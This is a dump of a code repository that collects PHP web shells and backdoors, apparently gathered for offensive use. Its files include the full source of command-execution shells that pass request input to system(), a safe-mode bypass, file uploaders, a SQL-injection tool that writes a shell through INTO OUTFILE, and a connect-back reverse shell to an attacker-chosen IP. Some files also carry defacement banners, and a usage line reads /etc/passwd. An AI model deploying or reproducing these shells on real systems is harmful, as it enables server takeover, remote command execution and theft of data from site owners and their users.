    61 | -------------------------------------------------------------------------------- /PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php -------------------------------------------------------------------------------- /PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.txt -------------------------------------------------------------------------------- /PHP/NetworkFileManagerPHP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/NetworkFileManagerPHP.txt -------------------------------------------------------------------------------- /PHP/PH Vayv.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/PH Vayv.txt -------------------------------------------------------------------------------- /PHP/PHANTASMA.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/PHANTASMA.txt -------------------------------------------------------------------------------- /PHP/PHPRemoteView.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/PHPRemoteView.txt -------------------------------------------------------------------------------- /PHP/PHPSPY.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/PHPSPY.php -------------------------------------------------------------------------------- /PHP/Php_Backdoor.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Php_Backdoor.txt -------------------------------------------------------------------------------- /PHP/Private-i3lue.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Private-i3lue.php -------------------------------------------------------------------------------- /PHP/Private-i3lue.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Private-i3lue.txt -------------------------------------------------------------------------------- /PHP/RedhatC99 [login=redhat-pass=root]: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/RedhatC99 [login=redhat-pass=root] -------------------------------------------------------------------------------- /PHP/Safe mode breaker.php: -------------------------------------------------------------------------------- 1 | ".getcwd().""; 10 | 11 | echo "
    "; 12 | echo "
    Root directory:
    "; 13 | echo "
    "; 14 | 15 | echo "
    "; 16 | 17 | // break fucking safe-mode ! 18 | 19 | $root = "/"; 20 | 21 | if($_POST['root']) $root = $_POST['root']; 22 | 23 | if (!ini_get('safe_mode')) die("Safe-mode is OFF."); 24 | 25 | $c = 0; $D = array(); 26 | set_error_handler("eh"); 27 | 28 | $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; 29 | 30 | for($i=0; $i < strlen($chars); $i++){ 31 | $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}"; 32 | 33 | $prevD = $D[count($D)-1]; 34 | glob($path."*"); 35 | 36 | if($D[count($D)-1] != $prevD){ 37 | 38 | for($j=0; $j < strlen($chars); $j++){ 39 | 40 | $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}"; 41 | 42 | $prevD2 = $D[count($D)-1]; 43 | glob($path."*"); 44 | 45 | if($D[count($D)-1] != $prevD2){ 46 | 47 | 48 | for($p=0; $p < strlen($chars); $p++){ 49 | 50 | $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}"; 51 | 52 | $prevD3 = $D[count($D)-1]; 53 | glob($path."*"); 54 | 55 | if($D[count($D)-1] != $prevD3){ 56 | 57 | 58 | for($r=0; $r < strlen($chars); $r++){ 59 | 60 | $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}"; 61 | glob($path."*"); 62 | 63 | } 64 | 65 | } 66 | 67 | } 68 | 69 | } 70 | 71 | } 72 | 73 | } 74 | 75 | } 76 | 77 | $D = array_unique($D); 78 | 79 | echo ""; 80 | foreach($D as $item) echo "{$item}\n"; 81 | echo ""; 82 | 83 | 84 | 85 | 86 | function eh($errno, $errstr, $errfile, $errline){ 87 | 88 | global $D, $c, $i; 89 | preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o); 90 | if($o){ $D[$c] = $o[2]; $c++;} 91 | 92 | } 93 | 94 | ?> -------------------------------------------------------------------------------- /PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt -------------------------------------------------------------------------------- /PHP/SnIpEr_SA Shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/SnIpEr_SA Shell.txt -------------------------------------------------------------------------------- /PHP/Uploader.txt: -------------------------------------------------------------------------------- 1 |
    2 | 3 | Send this file: 4 | 5 |
    6 | 9 | 10 | -------------------------------------------------------------------------------- /PHP/Worse Linux Shell.php: -------------------------------------------------------------------------------- 1 | body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}"; 6 | print "

    #worst @dal.net

    "; 7 | print "

    You have been hack By Shany with Love To #worst.

    "; 8 | print "

    Watch Your system Shany was here.

    "; 9 | print "

    Linux Shells

    "; 10 | print "

    "; 11 | 12 | $currentWD = str_replace("\\\\","\\",$_POST['_cwd']); 13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']); 14 | 15 | $UName = `uname -a`; 16 | $SCWD = `pwd`; 17 | $UserID = `id`; 18 | 19 | if( $currentWD == "" ) { 20 | $currentWD = $SCWD; 21 | } 22 | 23 | print ""; 24 | print ""; 25 | print ""; 26 | print ""; 27 | print ""; 28 | print "
    We are:".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
    Server is:".$_SERVER['SERVER_SIGNATURE']."
    System type:$UName
    Our permissions:$UserID
    "; 29 | 30 | print "

    "; 31 | 32 | if( $_POST['_act'] == "List files!" ) { 33 | $currentCMD = "ls -la"; 34 | } 35 | 36 | print "
    "; 37 | 38 | print ""; 39 | print ""; 40 | 41 | print ""; 42 | print ""; 43 | 44 | print ""; 45 | print ""; 46 | 47 | print "
    Execute command:
    Change directory:
    Upload file:


    "; 48 | 49 | $currentCMD = str_replace("\\\"","\"",$currentCMD); 50 | $currentCMD = str_replace("\\\'","\'",$currentCMD); 51 | 52 | if( $_POST['_act'] == "Upload!" ) { 53 | if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { 54 | print "
    Error while uploading file!
    "; 55 | } else { 56 | print "
    ";
    57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
    58 |         print "
    File uploaded successfully!
    "; 59 | } 60 | } else { 61 | print "\n\n\n
    \n";
    62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
    63 |     system($currentCMD);
    64 |     print "\n
    \n\n\n

    Command completed
    "; 65 | } 66 | 67 | exit; 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /PHP/Worse Linux Shell.txt: -------------------------------------------------------------------------------- 1 | body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}"; 6 | print "

    #worst @dal.net

    "; 7 | print "

    You have been hack By Shany with Love To #worst.

    "; 8 | print "

    Watch Your system Shany was here.

    "; 9 | print "

    Linux Shells

    "; 10 | print "

    "; 11 | 12 | $currentWD = str_replace("\\\\","\\",$_POST['_cwd']); 13 | $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']); 14 | 15 | $UName = `uname -a`; 16 | $SCWD = `pwd`; 17 | $UserID = `id`; 18 | 19 | if( $currentWD == "" ) { 20 | $currentWD = $SCWD; 21 | } 22 | 23 | print ""; 24 | print ""; 25 | print ""; 26 | print ""; 27 | print ""; 28 | print "
    We are:".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")
    Server is:".$_SERVER['SERVER_SIGNATURE']."
    System type:$UName
    Our permissions:$UserID
    "; 29 | 30 | print "

    "; 31 | 32 | if( $_POST['_act'] == "List files!" ) { 33 | $currentCMD = "ls -la"; 34 | } 35 | 36 | print "
    "; 37 | 38 | print ""; 39 | print ""; 40 | 41 | print ""; 42 | print ""; 43 | 44 | print ""; 45 | print ""; 46 | 47 | print "
    Execute command:
    Change directory:
    Upload file:


    "; 48 | 49 | $currentCMD = str_replace("\\\"","\"",$currentCMD); 50 | $currentCMD = str_replace("\\\'","\'",$currentCMD); 51 | 52 | if( $_POST['_act'] == "Upload!" ) { 53 | if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) { 54 | print "
    Error while uploading file!
    "; 55 | } else { 56 | print "
    ";
    57 |         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
    58 |         print "
    File uploaded successfully!
    "; 59 | } 60 | } else { 61 | print "\n\n\n
    \n";
    62 |     $currentCMD = "cd ".$currentWD.";".$currentCMD;
    63 |     system($currentCMD);
    64 |     print "\n
    \n\n\n

    Command completed
    "; 65 | } 66 | 67 | exit; 68 | 69 | ?> 70 | -------------------------------------------------------------------------------- /PHP/aZRaiLPhp v1.0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/aZRaiLPhp v1.0.php -------------------------------------------------------------------------------- /PHP/aZRaiLPhp v1.0.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/aZRaiLPhp v1.0.txt -------------------------------------------------------------------------------- /PHP/accept_language.txt: -------------------------------------------------------------------------------- 1 | by q1w2e3r4'; ?> 2 | -------------------------------------------------------------------------------- /PHP/antichat.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/antichat.php -------------------------------------------------------------------------------- /PHP/arabicspy.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/arabicspy.php -------------------------------------------------------------------------------- /PHP/b374k.v1.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/b374k.v1.txt -------------------------------------------------------------------------------- /PHP/bdotw44shell.txt: -------------------------------------------------------------------------------- 1 | \n"); 9 | define("ln","\n"); 10 | global $formcmd; 11 | if(!empty($_POST["cmd"])) { 12 | $formcmd = $_POST["cmd"]; 13 | } 14 | function wr($txt){echo $txt;} 15 | function com($txt){wr("xplo@sexec~$ ".$txt);} 16 | function root($txt){wr("xplo@sexec~# ".$txt);} 17 | function funcex($func,$txt="Using: "){com($txt.$func.ln);return $var = function_exists($func);} 18 | //styling 19 | echo ''.ln; 20 | echo '
    '.ln; 21 | echo ''.ln; 124 | echo ''.ln; 127 | echo ''.br; 128 | echo ''.ln; 129 | ?> 130 | -------------------------------------------------------------------------------- /PHP/bug (1).php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHP/bug.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /PHP/c100.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/c100.txt -------------------------------------------------------------------------------- /PHP/c66.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/c66.php -------------------------------------------------------------------------------- /PHP/c99.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/c99.php -------------------------------------------------------------------------------- /PHP/c99.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/c99.txt -------------------------------------------------------------------------------- /PHP/c993.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/c993.txt -------------------------------------------------------------------------------- /PHP/c99_PSych0.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/c99_PSych0.php -------------------------------------------------------------------------------- /PHP/c99shell.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/c99shell.php -------------------------------------------------------------------------------- /PHP/c99v2.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/c99v2.php -------------------------------------------------------------------------------- /PHP/cmd.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 |
    16 |
    17 | 
    22 | 
    23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /PHP/cmd.txt: -------------------------------------------------------------------------------- 1 |
    -------------------------------------------------------------------------------- /PHP/connect-back.php.txt: -------------------------------------------------------------------------------- 1 | ZoRBaCK Connect' ); 16 | 17 | echo "
    ZoRBaCK Connect
    18 | Usage: nc -vv -l -p 21
    19 |
    20 |

    21 | Your IP & Port:
    22 | 23 |

    24 |

    25 |
    26 |
    "; 27 | 28 | $ipim=$_POST['ipim']; 29 | $portum=$_POST['portum']; 30 | if ($ipim <> "") 31 | { 32 | $mucx=fsockopen($ipim , $portum , $errno, $errstr ); 33 | if (!$mucx){ 34 | $result = "Error: didnt connect !!!"; 35 | } 36 | else { 37 | 38 | $zamazing0="\n"; 39 | 40 | fputs ($mucx ,"\nwelcome ZoRBaCK\n\n"); 41 | fputs($mucx , system("uname -a") .$zamazing0 ); 42 | fputs($mucx , system("pwd") .$zamazing0 ); 43 | fputs($mucx , system("id") .$zamazing0.$zamazing0 ); 44 | while(!feof($mucx)){ 45 | fputs ($mucx); 46 | $one="[$"; 47 | $two="]"; 48 | $result= fgets ($mucx, 8192); 49 | $message=`$result`; 50 | fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n"); 51 | } 52 | fclose ($mucx); 53 | } 54 | } 55 | 56 | ?> -------------------------------------------------------------------------------- /PHP/ctt_sh.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/ctt_sh.txt -------------------------------------------------------------------------------- /PHP/cybershell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/cybershell.txt -------------------------------------------------------------------------------- /PHP/egy.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/egy.txt -------------------------------------------------------------------------------- /PHP/erne.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/erne.txt -------------------------------------------------------------------------------- /PHP/ex0shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/ex0shell.txt -------------------------------------------------------------------------------- /PHP/gfs_sh.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/gfs_sh.txt -------------------------------------------------------------------------------- /PHP/h4ntu shell [powered by tsoi].php: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

    "; 4 | ?> 5 | 6 | 16 | 17 |
    18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
    :
    User Info: uid=() euid=() gid=()
    Current Path:
    Permission Directory:
    Server Services:
    Server Adress:
    Script Current User:
    PHP Version:
    55 |
    56 | 57 | #php injection:
    58 |
    "> 59 | cmd : 60 | 61 |
    62 | 63 |
    64 | 65 |
    66 | 67 |
    68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    73 |   $output = ob_get_contents();
    74 |   ob_end_clean();
    75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
    76 | exit;
    77 | ?>
    78 | 
    79 | -------------------------------------------------------------------------------- /PHP/h4ntu shell [powered by tsoi].txt: -------------------------------------------------------------------------------- 1 | h4ntu shell [powered by tsoi] 2 | This Is The Server Information

    "; 4 | ?> 5 | 6 | 16 | 17 |
    18 | 19 | 23 | 24 | 25 | 26 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 |
    :
    User Info: uid=() euid=() gid=()
    Current Path:
    Permission Directory:
    Server Services:
    Server Adress:
    Script Current User:
    PHP Version:
    55 |
    56 | 57 | #php injection:
    58 |
    "> 59 | cmd : 60 | 61 |
    62 | 63 |
    64 | 65 |
    66 | 67 |
    68 |  /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
    73 |   $output = ob_get_contents();
    74 |   ob_end_clean();
    75 |   if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
    76 | exit;
    77 | ?>
    78 | 
    79 | -------------------------------------------------------------------------------- /PHP/iMHaPFtp.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/iMHaPFtp.txt -------------------------------------------------------------------------------- /PHP/kral.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/kral.txt -------------------------------------------------------------------------------- /PHP/lamashell.txt: -------------------------------------------------------------------------------- 1 | 18 | 20 | 21 | 22 | lama's'hell v. 3.0 23 | 30 | 31 | 32 |
    33 |                               _           _
    34 |                              / \_______ /|_\
    35 |                             /          /_/ \__
    36 |                            /             \_/ /
    37 |                          _|_              |/|_
    38 |                          _|_  O    _    O  _|_
    39 |                          _|_      (_)      _|_
    40 |                           \                 /
    41 |                            _\_____________/_
    42 |                           /  \/  (___)  \/  \
    43 |                           \__(  o     o  )__/ 
    58 | 
    59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 |
    Execute command:
    Change directory:
    Upload file:
    67 |

    68 |
    "; 72 | } else { 73 | echo "There was an error uploading the file, please try again!"; 74 | } 75 | } 76 | if(($_POST['exe']) == "Execute") { 77 | $curcmd = "cd ".$curdir.";".$curcmd; 78 | $f=popen($curcmd,"r"); 79 | while (!feof($f)) { 80 | $buffer = fgets($f, 4096); 81 | $string .= $buffer; 82 | } 83 | pclose($f); 84 | echo htmlspecialchars($string); 85 | } 86 | ?> 87 |
    88 | 89 | 90 | -------------------------------------------------------------------------------- /PHP/list.php: -------------------------------------------------------------------------------- 1 | 11 | 12 | " . $filename . "
    "; 23 | } 24 | closedir($handle); 25 | } else { 26 | echo "FILE: " . $fichero . "

    ";
    27 |   $fp = fopen($fichero, "r");
    28 |   $buffer = fread($fp, filesize($fichero));
    29 |   echo $buffer;
    30 |   fclose($fp);
    31 |   }
    32 | 
    33 | ?>
    
    
    --------------------------------------------------------------------------------
    /PHP/load_shell.txt:
    --------------------------------------------------------------------------------
    https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/load_shell.txt
    
    
    --------------------------------------------------------------------------------
    /PHP/matamu.txt:
    --------------------------------------------------------------------------------
      1 | 
      6 | 
      7 | 
      8 | 
      9 |  Matamu Mat 
     10 | 
     11 | 
     12 | 

    13 | 14 | 56 | 57 |
    58 |

    Current working directory: 59 | Root/'; 64 | 65 | if (!empty($work_dir_splitted[0])) { 66 | $path = ''; 67 | for ($i = 0; $i < count($work_dir_splitted); $i++) { 68 | $path .= '/' . $work_dir_splitted[$i]; 69 | printf('%s/', 70 | $PHP_SELF, urlencode($path), $work_dir_splitted[$i]); 71 | } 72 | } 73 | 74 | ?>

    75 |

    Choose new working directory: 76 |

    115 | 116 |

    Command: 117 |

    118 | 119 |

    Enable stderr-trapping?

    120 | 137 |
    138 | 139 | 142 | 143 |
    144 | 145 | 146 | 147 | -------------------------------------------------------------------------------- /PHP/myshell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/myshell.txt -------------------------------------------------------------------------------- /PHP/mysql.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/mysql.txt -------------------------------------------------------------------------------- /PHP/nshell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/nshell.txt -------------------------------------------------------------------------------- /PHP/nst.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/nst.txt -------------------------------------------------------------------------------- /PHP/nstview.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/nstview.txt -------------------------------------------------------------------------------- /PHP/pHpINJ.txt: -------------------------------------------------------------------------------- 1 | 3 | 4 | 5 | || .::News Remote PHP Shell Injection::. || 6 | 7 | 8 |
    || .::News PHP Shell Injection::. ||


    9 | ' ,0 ,0 ,0 ,0 INTO OUTFILE '$outfile"; 15 | $sql = urlencode($sql); 16 | $expurl= $url."?id=".$sql ; 17 | echo ' Click Here to Exploit
    '; 18 | echo "After clicking go to http://www.site.com/path2phpshell/shell.php?cpc=ls to see results"; 19 | } 20 | else 21 | { 22 | ?> 23 | Url to index.php:
    24 |
    " method = "post"> 25 |
    26 | Server Path to Shell:
    27 | Full server path to a writable file which will contain the Php Shell
    28 |

    29 |

    30 | 31 | 32 | 33 | 36 | 37 | -------------------------------------------------------------------------------- /PHP/php-backdoor.txt: -------------------------------------------------------------------------------- 1 | "; 14 | if ($handle = opendir("$d")) { 15 | echo "

    listing of $d

    "; 16 | while ($dir = readdir($handle)){ 17 | if (is_dir("$d/$dir")) echo ""; 18 | else echo ""; 19 | echo "$dir\n"; 20 | echo ""; 21 | } 22 | 23 | } else echo "opendir() failed"; 24 | closedir($handle); 25 | die ("
    "); 26 | } 27 | if(isset($_REQUEST['c'])){ 28 | echo "
    ";
    29 | 	system($_REQUEST['c']);		   
    30 | 	die;
    31 | }
    32 | if(isset($_REQUEST['upload'])){
    33 | 
    34 | 		if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
    35 | 			else $dir=$_REQUEST['dir'];
    36 | 		$fname=$HTTP_POST_FILES['file_name']['name'];
    37 | 		if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
    38 | 			die('file uploading error.');
    39 | }
    40 | if(isset($_REQUEST['mquery'])){
    41 | 	
    42 | 	$host=$_REQUEST['host'];
    43 | 	$usr=$_REQUEST['usr'];
    44 | 	$passwd=$_REQUEST['passwd'];
    45 | 	$db=$_REQUEST['db'];
    46 | 	$mquery=$_REQUEST['mquery'];
    47 | 	mysql_connect("$host", "$usr", "$passwd") or
    48 |     die("Could not connect: " . mysql_error());
    49 |     mysql_select_db("$db");
    50 |     $result = mysql_query("$mquery");
    51 | 	if($result!=FALSE) echo "

    query was executed correctly

    \n"; 52 | while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); 53 | mysql_free_result($result); 54 | die; 55 | } 56 | ?> 57 |
    execute command: 
    58 |
    59 | upload file: to dir:   
    60 |
    to browse go to http://?d=[directory here] 61 |
    for example: 62 | http://?d=/etc on *nix 63 | or http://?d=c:/windows on win 64 |
    execute mysql query: 65 |
    66 | host: user: password: 67 | 68 | database: query: 69 |
    70 | 71 | 72 | -------------------------------------------------------------------------------- /PHP/priv8-2012-bypass-shell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/priv8-2012-bypass-shell.txt -------------------------------------------------------------------------------- /PHP/pws.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 |
    Input command :
    4 |
    5 |
    6 |
     7 | 
    13 | 
    14 |
    15 |
    Uploader file :
    16 | 17 |
    27 | 28 | "> 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /PHP/r57shell1.40.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/r57shell1.40.txt -------------------------------------------------------------------------------- /PHP/remview_fix.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/remview_fix.php -------------------------------------------------------------------------------- /PHP/rootshell.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/rootshell.txt -------------------------------------------------------------------------------- /PHP/ru24_post_sh.txt: -------------------------------------------------------------------------------- 1 | 11 | 12 | Ru24PostWebShell - ".$_POST['cmd']." 13 | 14 | "; 15 | echo ""; 16 | echo ""; 17 | echo ""; 18 | echo "
    ";
    19 | if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
    20 | echo "".$function($_POST['cmd'])."
    "; 21 | 22 | 23 | ?> 24 | -------------------------------------------------------------------------------- /PHP/s72 Shell v1.1 Coding.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/s72 Shell v1.1 Coding.php -------------------------------------------------------------------------------- /PHP/s72 Shell v1.1 Coding.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/s72 Shell v1.1 Coding.txt -------------------------------------------------------------------------------- /PHP/safe0ver.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Snifer/L4bsForShell/d319c03b7c46720fcc648c762170f99bf1c103a7/PHP/safe0ver.txt -------------------------------------------------------------------------------- /PHP/simple-backdoor.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | "; 7 | $cmd = ($_REQUEST['cmd']); 8 | system($cmd); 9 | echo "
    "; 10 | die; 11 | } 12 | 13 | ?> 14 | 15 | Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd 16 | 17 | 18 | -------------------------------------------------------------------------------- /PHP/simple_cmd.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | G-Security Webshell 4 | 5 | 6 | 7 |
    8 |
    9 | 11 |
    12 |
    13 | 
    14 | 
    15 | 
    16 |
    17 | 18 | 11 | 12 | 13 | 14 |
    15 | 16 |

    Local File: 17 |

    Remote File: 18 | 19 |




    20 | 21 | 31 | 32 | 33 | 34 | -------------------------------------------------------------------------------- /PHP/uploader.txt: -------------------------------------------------------------------------------- 1 |
    2 | 3 | Send this file: 4 | 5 |
